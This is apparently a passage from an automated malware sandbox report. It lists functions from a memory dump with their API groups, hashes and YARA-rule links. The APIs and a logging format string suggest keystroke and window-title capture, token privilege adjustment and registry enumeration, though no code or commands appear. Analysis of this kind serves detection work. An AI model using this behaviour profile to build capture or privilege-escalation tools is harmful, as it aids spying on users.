                                                                                    • Opcode ID: e2946a4514b7f479ca24c668fcf9bbb0cde032c8894c0529b080685878dc6b83
                                                                                    • Instruction ID: 7d0385ef6c638e2ff7d93b7fe6935e5097676e37e7ebeed375b43356656993b4
                                                                                    • Opcode Fuzzy Hash: e2946a4514b7f479ca24c668fcf9bbb0cde032c8894c0529b080685878dc6b83
                                                                                    • Instruction Fuzzy Hash: 1012C82371815186FB32BB15E16E36AF6AEF3C07E4FD84A12E69507EC4C739C5A08B54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0DD600, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113stringtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
                                                                                    • String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
                                                                                    • API String ID: 67575802-2837871436
                                                                                    • Opcode ID: c5a50a4e454de03d5974ffda851e0112d8c17b32a017683c7d2d5897f3aa73a1
                                                                                    • Instruction ID: da5589b1da16a9d648805e8a969ead0396311df84f562e3d78da1f402cef671a
                                                                                    • Opcode Fuzzy Hash: c5a50a4e454de03d5974ffda851e0112d8c17b32a017683c7d2d5897f3aa73a1
                                                                                    • Instruction Fuzzy Hash: A2518B37204B8086EB619F21F0583AAF7A5F3C5BD0F445116DA8A43BD8EB7CC15ACB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0EC600, Relevance: 9.0, APIs: 6, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Token$CloseHandleProcess$AddressAdjustCurrentDuplicateInformationLibraryLoadOpenPrivilegeProc
                                                                                    • String ID:
                                                                                    • API String ID: 3800857282-0
                                                                                    • Opcode ID: 3cdb79d2e82c80578a60607dd41fcd483eddf174bc6b123a3a58a5ea1a2a2239
                                                                                    • Instruction ID: 29fa54fb9c2dff05b53cae3f88c73a98a93f2100ad1f5ab8dde5bdeb96ed64e1
                                                                                    • Opcode Fuzzy Hash: 3cdb79d2e82c80578a60607dd41fcd483eddf174bc6b123a3a58a5ea1a2a2239
                                                                                    • Instruction Fuzzy Hash: C8117033208A8586EB11DFA1F85875BF778F7C8BD4F045119EA8947AA8DFB9C558CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0E3E60, Relevance: 7.7, APIs: 5, Instructions: 248registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumValue$CloseInfoOpenQuery
                                                                                    • String ID:
                                                                                    • API String ID: 2078201404-0
                                                                                    • Opcode ID: f7007b3bc2798b3a41bbe3608d341f6c812dcbdb399c756e295e247f5bd2a31c
                                                                                    • Instruction ID: fbfbe3d24cfbc5313f9d752afa3bde16f0b0583f895eb3004d89b38359096cec
                                                                                    • Opcode Fuzzy Hash: f7007b3bc2798b3a41bbe3608d341f6c812dcbdb399c756e295e247f5bd2a31c
                                                                                    • Instruction Fuzzy Hash: 70B15633B10A408EEB12EF71E59469DB7B9F788BD8F401229EE4A67B98DB34C515C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D11762C, Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _set_statfp
                                                                                    • String ID:
                                                                                    • API String ID: 1156100317-0
                                                                                    • Opcode ID: 5775c5d13c4e64004754ee0314eb150a4182c69c28ee82591c9a2c52d77396f5
                                                                                    • Instruction ID: f6ca50ea404e57bfdea6072f85456b614ad7a3908578a248aeb9b9f78e007d68
                                                                                    • Opcode Fuzzy Hash: 5775c5d13c4e64004754ee0314eb150a4182c69c28ee82591c9a2c52d77396f5
                                                                                    • Instruction Fuzzy Hash: 5D11A063650A01C5FA6B112CE48E3B995896BE63F0F184A24F9E607FD7DB1BCC60C310
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D119E50, Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_taskException$FileHeaderRaiseThrow
                                                                                    • String ID:
                                                                                    • API String ID: 1107440535-0
                                                                                    • Opcode ID: 08e890c52bc48befd5332d8d697b5584f560ef112cc41b2cc78d90b902c3ca8f
                                                                                    • Instruction ID: f651300ad88c776b89c8f117c9cc4543a78638c0a6146689c5d2c50b78278e40
                                                                                    • Opcode Fuzzy Hash: 08e890c52bc48befd5332d8d697b5584f560ef112cc41b2cc78d90b902c3ca8f
                                                                                    • Instruction Fuzzy Hash: F701C473642B5084EF16EB71E0593A9A3ADA7C47F4F105B21E97D06BD5EF29C1618240
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0E8E70, Relevance: 7.5, APIs: 5, Instructions: 36threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DesktopThread$CloseCurrentInformationObjectUser
                                                                                    • String ID:
                                                                                    • API String ID: 2068333509-0
                                                                                    • Opcode ID: 2855c0745dc3fe0bbaa13e106c2f61881320f9d356a01525ebe49a3d4c4c94ac
                                                                                    • Instruction ID: 5e902251e15017608e9b26d447185cdf6b5ba861cf6c53d8358ce9a63a9181e5
                                                                                    • Opcode Fuzzy Hash: 2855c0745dc3fe0bbaa13e106c2f61881320f9d356a01525ebe49a3d4c4c94ac
                                                                                    • Instruction Fuzzy Hash: 65014F32315B85C6EA62DB62F9183AAA3A8F7CDBC0F401425DA5A47B94DF3DC0558700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0E2E30, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                    • String ID:
                                                                                    • API String ID: 118556049-0
                                                                                    • Opcode ID: f38b30f50d4b29fc3a6b270e24c7fc43ab540329ff345040f5d556fd8d01ae4e
                                                                                    • Instruction ID: 2e3ff3c9570660316dfc2783f841c07b13be60123d83438d3d728bf499798d7c
                                                                                    • Opcode Fuzzy Hash: f38b30f50d4b29fc3a6b270e24c7fc43ab540329ff345040f5d556fd8d01ae4e
                                                                                    • Instruction Fuzzy Hash: 0621BEB3600B8099EA19AB75F55838DA268B7887F0F549728DB7D037D9DB30C0618300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0ECE40, Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3604237281-0
                                                                                    • Opcode ID: ce6523f493ae27f2cadbe02f6ee39b5b7731bb75727c7d156176c859cec8e6e0
                                                                                    • Instruction ID: 09f61e9846867082b158120667d3bbe52a5272e4b6fabe15669bd74e8c2eda68
                                                                                    • Opcode Fuzzy Hash: ce6523f493ae27f2cadbe02f6ee39b5b7731bb75727c7d156176c859cec8e6e0
                                                                                    • Instruction Fuzzy Hash: E2212223B1578082F7128B2DA459B29E764F7C97D8F105314EA9902BD0DB39C068C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0000024B7D0EB650, Relevance: 6.0, APIs: 4, Instructions: 27synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Offset: 0000024B7D0D0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 2079671238-0
                                                                                    • Opcode ID: c01c08db0211a0849afbd09bd011f717ce6583b3c6389de65e867f292b032ef4
                                                                                    • Instruction ID: e8e36420bf3ed55e7feb7a8399bbe55bc96f56106746e30d9ab1ea6c115b7694
                                                                                    • Opcode Fuzzy Hash: c01c08db0211a0849afbd09bd011f717ce6583b3c6389de65e867f292b032ef4
                                                                                    • Instruction Fuzzy Hash: 0AF0EC36212B0585EB02DF75E8682587368FBD9BD4F540122D91D877E4DF39C5A6C350
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%